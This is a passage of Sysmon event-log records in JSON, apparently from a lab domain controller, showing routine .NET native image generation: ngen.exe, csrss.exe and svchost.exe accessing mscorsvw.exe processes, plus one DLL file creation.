work64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.435","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-0010F6850E00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-0010F6850E00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-0010F6850E00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-0010F6850E00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-0010F6850E00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.466\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-001049650F00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.466","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-001049650F00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-001049650F00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-001049650F00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.482\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-001049650F00}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.482","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-001049650F00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:18.654\r\nProcessGuid: {E2A3D6B1-137A-5F25-0000-001049650F00}\r\nProcessId: 4616\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1208-0\\System.Runtime.Caching.dll\r\nCreationUtcTime: 2020-08-01 07:02:18.654","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:18.654","ProcessGuid":"{E2A3D6B1-137A-5F25-0000-001049650F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1208-0\\System.Runtime.Caching.dll","CreationUtcTime":"2020-08-01 07:02:18.654","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.685\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-0010F9680F00}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.685","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-0010F9680F00}","TargetProcessId":"2956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.685\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-0010F9680F00}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.685","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-0010F9680F00}","TargetProcessId":"2956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.685\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-0010F9680F00}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 